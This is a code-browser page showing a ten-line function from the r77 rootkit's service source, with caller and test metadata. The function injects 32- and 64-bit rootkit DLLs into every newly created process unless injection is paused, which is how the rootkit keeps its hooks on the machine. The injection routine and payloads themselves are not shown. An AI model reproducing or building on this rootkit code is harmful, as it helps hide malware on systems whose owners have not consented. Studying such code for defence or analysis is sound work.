MCPcopy Create free account
hub / github.com/bytecode77/r77-rootkit / NewProcessCallback

Function NewProcessCallback

Service/Service.c:140–149  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

138 }
139}
140VOID NewProcessCallback(DWORD processId)
141{
142 // Hook new processes that might have been missed by child process hooking.
143
144 if (!IsInjectionPaused)
145 {
146 InjectDll(processId, RootkitDll32, RootkitDll32Size);
147 InjectDll(processId, RootkitDll64, RootkitDll64Size);
148 }
149}
150VOID ControlCallback(DWORD controlCode, HANDLE pipe)
151{
152 // The r77 service received a command from another process.

Callers

nothing calls this directly

Calls 1

InjectDllFunction · 0.85

Tested by

no test coverage detected